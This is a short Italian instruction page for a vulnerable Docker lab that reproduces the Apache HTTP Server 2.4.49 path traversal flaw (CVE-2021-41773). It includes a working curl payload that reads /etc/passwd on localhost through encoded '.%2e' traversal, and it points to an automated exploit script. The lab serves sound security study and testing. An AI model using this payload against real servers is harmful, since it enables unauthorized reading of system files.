
Lab Docker vulnerabile ed exploit per la vulnerabilità di path traversal di Apache HTTP Server 2.4.49 (CVE‑2021‑41773)
git clone https://github.com/zubairahm3d/apache-cve-2021-41773-lab.git
cd apache-cve-2021-41773-lab
chmod +x apache_lab.sh
Avvia il server vulnerabile:
./apache_lab.sh # choose option 1
Exploit manuale:
curl --path-as-is http://127.0.0.1:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
Exploit automatico:
python3 exploit.py
Ferma il server:
./apache_lab.sh # choose option 2



